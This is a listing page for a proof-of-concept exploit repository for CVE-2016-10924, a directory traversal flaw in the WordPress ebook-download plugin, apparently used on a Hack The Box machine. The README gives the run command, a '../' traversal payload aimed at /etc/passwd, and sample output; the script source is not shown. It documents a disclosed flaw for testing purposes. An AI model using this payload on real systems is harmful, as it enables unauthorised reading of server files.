CVE-2016-10924 PoC — WordPress ebook-download插件路径遍历漏洞

Source

Associated Vulnerability

Description

Proof-of-Concept (PoC) exploit script for the Directory Traversal vulnerability (CVE-2016-10924) found in the WordPress plugin ebook-download (versions < 1.2). This vulnerability allows unauthorized file reads via a crafted GET request. 

Readme

# CVE-2016-10924-POC

This repository contains a Proof-of-Concept (PoC) exploit script for the **Directory Traversal** vulnerability (CVE-2016-10924) found in the WordPress plugin **ebook-download** (versions < 1.2). 

This vulnerability allows unauthorized file reads via a crafted GET request. The exploit leverages a parameter called `ebookdownloadurl` to traverse directories on the target server.

## Description

- **CVE-ID:** [CVE-2016-10924](https://nvd.nist.gov/vuln/detail/CVE-2016-10924)  
- **Vulnerability Type:** Directory Traversal  
- **Affected Component:** `ebook-download` plugin < 1.2 for WordPress  
- **Impact:** Remote attackers can read arbitrary files on the underlying operating system, such as `/etc/passwd`, by manipulating the file path in the `ebookdownloadurl` parameter.  

> **Note:** This PoC is for **educational and authorized testing** purposes only. Misuse of this information can lead to legal consequences.

## Requirements

- Python 3.
- `requests` library (install via `pip install requests`)

## Usage

1. **Clone the repository**:
   ```bash
   git clone https://github.com/your-user/CVE-2016-10924-POC.git
   cd CVE-2016-10924-POC
   ```
2. **Install Dependencies**:
   ```bash
   pip install requests
   ```
3. **Run the Exploit**:
   ```bash
   python3 cve-2016-10924.py "http://TARGET/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
   ```
4. **Specify the file path to read**:
   After launching the script, you will be prompted for a file path. For example:
   ```bash
   ../../../../../../../../../etc/passwd
   ```
   You may need to adjust the number of `../` based on the webroot location in the target environment.

5. **Exit**: 
   - Type `exit`, `quit`, or press **Enter** on an empty prompt to exit.
   - Press **Ctrl + C** to stop the script immediately.

### Example

I used this exploit on "Backdoor", a retired Hack The Box machine:

```bash
$ python3 cve-2016-10924.py "http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl="
[*] Enter file paths (e.g. ../../../../../etc/passwd). Type 'exit' to quit.

Enter File path: ../../../../../../../../../etc/passwd
[*] Target URL: http://backdoor.htb/wp-content/plugins/ebook-download/filedownload.php?ebookdownloadurl=../../../../../../../../../etc/passwd
[+] Status Code: 200
[+] File Content:
root:x:0:0:root:/root:/bin/bash
...
```

## Disclaimer

This project is intended solely for **educational** and **legitimate security testing** purposes.  
**Do not** use the information or scripts within this repository on any system you do not have explicit permission to test.  
Author and contributors are **not** responsible for any misuse or damage caused by this tool.

## License

This project is licensed under the [GNU 2.0 License](LICENSE). Feel free to use and modify it, but please give credit.

---

**References**

- [NVD - CVE-2016-10924](https://nvd.nist.gov/vuln/detail/CVE-2016-10924)
- [WordPress Plugin ebook-download](https://wordpress.org/plugins/ebook-download/#developers) *(for vulnerable versions reference)*

File Snapshot

 [4.0K]  /data/pocs/952128880f84f9ae5b0136d31d45b80df3d794fb
├── [3.9K]  cve-2016-10924.py
├── [ 18K]  LICENSE
└── [3.0K]  README.md

0 directories, 3 files

Remarks